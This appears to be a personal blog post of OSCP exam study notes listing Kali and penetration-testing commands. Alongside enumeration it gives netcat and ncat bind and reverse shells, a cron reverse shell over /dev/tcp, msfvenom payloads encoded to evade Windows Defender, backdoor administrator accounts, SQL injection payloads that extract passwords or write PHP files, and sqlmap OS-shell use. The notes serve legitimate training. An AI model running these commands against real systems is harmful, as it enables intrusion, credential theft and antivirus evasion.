OSCP day 3

Locate

  • Finding files
    locate kim.txt
  • Update
    updatedb
  • e.g.
    locate nc.exe

Which

  • See manual for which
    man which
  • e.g.
    which sbd

find

  • Manual
    man find
  • Find recursively 
    find . -name php.ini
  • e.g.
    find ~/ -name kim* 
  • execute after each find
    find ~/ -name kim* -exec file {} \;
  • more e.g.
    sudo find /usr -name sbd* -exec file {} \;

Service

  • Start a service (they are same)
    sudo systemctl start apache2
    sudo service apache2 start
    /etc/init.d/apache2 start

Boot persistence 

  • Start at boot (they are same)
    sudo systemctl enable ssh.service
    sudo update-rc.d ssh enable
    rcconf

grep with regular expression

  • e.g. (only string)
    grep -o '[A-Za-z0-9_\.-]*\.whatsapp.com' index.html
    grep -o 'https://[A-Za-z0-9_\.-]*\.whatsapp.com' index.html
  • e.g. regular expression
    grep -e '[A-Za-z0-9_\.-]*\.whatsapp.com' index.html
    grep -e 'https://[A-Za-z0-9_\.-]*\.whatsapp.com' index.html

Learn to write a bash script

  • nano cisco.sh
    chmod 755 cisco.sh or chmod +x cisco.sh
  • #!/bin/bash

    for url in $(cat cisco.txt); do
    host $url | grep "has address" | cut -d " " -f4
    done
  • Scenario:
    Grep all domains with app.com and return IP
  • #!/bin/bash

    for url in $(grep -o '[A-Za-z0-9_\.-]*\.*app.com' index.html | sort -u); do
    host $url | grep "has address" | cut -d " " -f4
    done
  • Scenario:
    Ping once and return IPs that response to ping
  • #!/bin/bash

    for ip in $(seq 1 254);do
    ping -c 1 10.123.38.$ip | grep "bytes from" | cut -d " " -f4 &
    done

Netcat (old)

  • Able to read and write to TCP & UDP
  • e.g. connect to ssh
    nc -nv 10.123.3.11 22 
  • e.g. connect to ftp
    nc -nv 10.123.9.11 21
  • e.g. chatting
    Listening: nc -nlvp 4444
    Connect back: nc -nv 10.123.3.11
  • e.g. file transfer
    Listener: nc -nvlp 4444 > download.exe
    Connect to Listener: nc -nv victim 4444 < /file/to/upload.exe
  • e.g. bind shell
    Listener binding shell (providing cmd): nc -nvlp 4444 -e cmd
    Connect to Listener: nc -nv host 4444 

  • e.g. reverse shell (when behind firewall)
    From outside (setup listener): nc -lvp 4444
    host behind firewall connect out: nc -nv 192.168.32.162 4444 -e cmd

ncat (new)

  • ncat bind shell
    Listener: ncat -lvp 4444 -e cmd --allow 192.168.32.162 --ssl
    Connect to Listener: ncat -v 192.168.32.53 4444 --ssl
  • ncat reverse shell (when behind firewall)
    From outside (setup listener): ncat -lvp 4444 --allow 192.168.32.53 --ssl
    host behind firewall connect out: ncat -v 192.168.32.162 4444 -e cmd --ssl

Google Search operators

  • site:
    site:”microsoft.com”
    site:”microsoft.com” -site:”www.microsoft.com”
  • filetype:
    site:”microsoft.com” filetype:ppt “penetration testing”
  • intitle:
    intitle:”VNC viewer for Java”
    intitle:”-N3t” filetype:php undetectable
  • inurl:
    inurl:”/control/userimage.html” camera
    inurl:.php? intext:character_sets,collations intitle:phpmyadmin
  • GHDB (Google Hacking DB)
    https://www.exploit-db.com/google-hacking-database

DNS enumeration 

  • ns (nameserver)
    host -t ns abc.com
  • mx
    host -t mx abc.com
  • host
    host abc.com

Forward DNS lookup

  • nano forward.sh
    chmod +x forward.sh
  • #!/bin/bash

    for name in $(cat list.txt);do
    host $name.abc.com | grep "has address"
    done

Reverse DNS lookup

  • Find the IP 
    host sub.abc.com
  • Loop thru the IP segment e.g. /27 or /28
  • nano reverse.sh
    chmod +x reverse.sh
  • #!/bin/bash

    for ip in $(seq 1 254); do
    host x.x.x.$ip | grep "abc.com"
    done

DNS zone transfer

  • Find the nameservers for the domain
    host -t ns abc.com
  • Attempt transfer
    host -l abc.com ns1.abc.com
    host -l abc.com ns2.abc.com
  • #!/bin/bash

    for server in $(host -t ns kim.sg | cut -d" " -f4); do
    host -l kim.sg $server;
    done

Port scanning with nc

  • nc -nv -w 1 -z 10.123.9.11 1-65535

SYN Scanning

  • No longer good for modern firewall

UDP Scanning

  • Unreliable as network devices like routers and firewall may drop

Nmap scanning

  • Scan a network with /24
    sudo nmap -sn 192.168.32.0/24
  • Save to output
    sudo nmap -sn 192.168.32.0/24 -oG ping-sweep-nmap.txt
  • Scan port 80 from /24 network (it’s not accurate for me)
    sudo nmap -p 3389 192.168.32.0/24
  • Scan top 20 ports
    sudo nmap -sT --top-ports 20 192.168.32.0/24
  • Scan for smb
    sudo nmap -p 139,445 192.168.32.11-12 --open
  • Scan with script
    cd /usr/share/nmap/scripts
    sudo nmap -v -p 80 --script all 10.123.3.13
  •  

nbtscan

  • netbios scan
    sudo nbtscan 192.168.32.0/24
  • connect via rpcclient
    sudo rpcclient -U “” 192.168.32.201
  • srvinfo
  • enumdomusers
  • getdompwinfo
  •  

SNMP

  • Scan for UDP on port 161
    sudo nmap -sU -p 161 10.123.31.33
  • Scan with 161
    onesixtyone 10.123.3.1 readonly
    onesixtyone 10.123.3.1 community_string
  • Scan with bruteforce
    onesixtyone -c community_string.txt 10.123.3.1
  • Scan with 161 for multiple hosts
    onesixtyone -c community 10.123.3.0/24
    onesixtyone -c community -i ips.txt
  • SNMP WALK v1
    snmpwalk -c readonly 10.123.3.1 -v1
  • SNMP WALK (running program
  • snmpwalk -c readonly -v1 10.123.3.1 1.3.6.1.2.1.25.4.2.1.2
  • SNMP WALK (e.g. Cisco)
    snmpwalk -c readonly -v1 10.123.3.1 iso.3.6.1.2.1.3.1.1.1
  • SNMP WALK (e.g.)
    snmpwalk -c readonly -v1 10.123.3.1 1.3.6.1.2.x
  • snmp-check (e.g.)
    snmp-check 10.123.3.1 -c readonly

Openvas

  • Install gvm
    sudo apt-get install gvm
  • Setup
    sudo gvm-setup
  • Start
    sudo gvm-start
  • SCAP database is required
    sudo gvm-stop
    sudo runuser -u _gvm -- greenbone-feed-sync --rsync
    sudo greenbone-scapdata-sync
    sudo greenbone-certdata-sync
  • Update
    sudo runuser -u _gvm -- greenbone-nvt-sync
    sudo runuser -u _gvm -- greenbone-feed-sync --type SCAP
    sudo runuser -u _gvm -- greenbone-feed-sync --type CERT
    sudo runuser -u _gvm -- greenbone-feed-sync --type GVMD_DATA
    Restart system and try again.

Buffer Overflow (applications)

  • pestudio
    pestudio malware initial assessment winitor.com
  • OllyDbg
    https://www.ollydbg.de/
  • immunity debugger
    https://www.immunityinc.com/products/debugger/

Buffer Overflow 

  • Convert SHELL Code to print (Hex string to text)
    printf $(cat fake-payload.txt | tr -d '\n')
  • Come back later for deeper study 

Searchsploit

  • e.g.
    searchsploit slmail

FTP Server (setup on Kali)

  • Install ftp server 
    sudo apt-get install pure-ftpd

  • Setup for new ftp user
    sudo groupadd ftpgroup
    sudo useradd -g ftpgroup -d /dev/null ftpuser
    sudo pure-pw useradd offsec -u ftpuser -d /tmp
    sudo pure-pw xyz
    cd /etc/pure-ftpd/auth
    sudo ln -s ../conf/PureDB 60pdb
    sudo chown ftpuser:ftpgroup /tmp
    sudo /etc/init.d/pure-ftpd restart

FTP. Run non-interactively (script)

  • Create ftp.txt containing instruction 
  • C:\Users\User\test>echo open 10.123.3.14 21 > ftp.txt
    C:\Users\User\test>echo loginID>> ftp.txt
    C:\Users\User\test>echo loginPW>> ftp.txt
    C:\Users\User\test>echo GET test.txt >> ftp.txt
    C:\Users\User\test>echo bye >> ftp.txt
  • Execute
    ftp -s:ftp.txt

PowerShell

  • Run PowerShell non-interactively
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File .\test.ps1

Escalation on Linux

  • Basic OS info
    cat /etc/issue
    uname -a
  • Download exploit (Write to a file)
    wget -O test.txt ipv4.kim.sg

  • Compile the exploit
    gcc test.txt -o exploit
  • Check the compiled file
    file exploit
  • Check current user privilege 
    id testuser

Escalation on Windows

  • After escalation create new user
    net user hacker hacker /add
  • Add the new user to admin group
    net localgroup administrator hacker /add

Windows weak service

  • icacls (Integrity Control Access Control Lists)
    icacls hamful.exe
  • Replace the vulnerable service executable with hamful.exe

Linux weak service

  • Find services with admin privileges (execute with low privileged user)
    find / -perm -2 ! -type l -ls 2>/dev/null
  • Similar
    find / -perm -2
    find / -perm -o=w
  • Symbolic links (-type l)
    find / -perm -2 ! -type l -ls 2>/dev/null
  • Errors will not be output to console
    2>/dev/null

Linux permission

  • Find directories writable by anyone
    sudo find /dir -perm -0002 -type d
  • Find files writable by anyone
    sudo find /dir -perm -0002 -type f

  • Find files writable symbolic links by anyone
    sudo find /dir -perm -0002 -type l
  • Find both f & d (exclude symbolic links)
    sudo find /dir -perm -2 ! -type l -ls

Reverse shell in cron

  • Setup listener 
    nc -lvp 443
  • Reverse shell command in cron
    bash -i >& /dev/tcp/10.123.3.12/443 0>&1

Generate payload with msfvenom

  • Window defender can detect
    msfvenom -p windows/adduser USER=attackerkim PASS=Password123 -f c -o adduser.exe --platform Windows -a x86
  • Bypass detection by encorder
    msfvenom -p windows/adduser USER=attackerkim PASS=Password123 --encoder x86/xor_dynamic -f c -o adduser.exe --platform Windows -a x86
  • Executing log file which was logging the payload
    Entering php code on the address bar. 

SQL Injection

  • On login form 
    username' or 1=1;#
  • Enumerate the table column. GET parameter on URL e.g. www.abc.com/comments.php?id=123 order by 6
  • http://abc.com/comments.php?id=123 order by 6

    # Study the result for injected behavior 
    php?id=123 or 1=2;#

    # Check if sleep function works
    php?id=123-sleep(1);

    # Check if sleep works
    select * from Staff where 1=1 -IF(MID(@@version,1,1)='8', sleep(1), 0);
    php?id=123-IF(MID(@@version,1,1)='8', sleep(1), 0);
  • After knowing the total number of columns use union
  • http://abc.com/comments.php?id=123 union select 1,2,3;
    http://abc.com/comments.php?id=123 union select 1,2,3,@@version;
    http://abc.com/comments.php?id=123 union select 1,2,3,user();

    .php?id=123 union select 1,2,3,table_name from information_schema.tables;
    .php?id=123 union select 1,2,3,column_name from information_schema.columns where table_name='user_summary';
    .php?id=123 union select 1,2,3,Login,Password FROM User;
  • Load host file
  • #Read a file
    http://abc.com/index.php?id=123 union select 1,2,3,load_file("/tmp/test.txt");

    #Write a file
    http://abc.com/index.php?id=123 union select 1,2,3,"write some text" into OUTFILE '/tmp/k.php';
    http://abc.com/index.php?id=123 union select 1,2,3,"<?php malicious();?>" into OUTFILE '/tmp/k.php';

SQL MAP

  • sqlmap
    sqlmap -u http://victim.com --crawl=1
  • Access to shell
    sqlmap -u https://victim.com/customer --dbms=mysql --os-shell --random-agent

 

Leave a Comment

Your email address will not be published. Required fields are marked *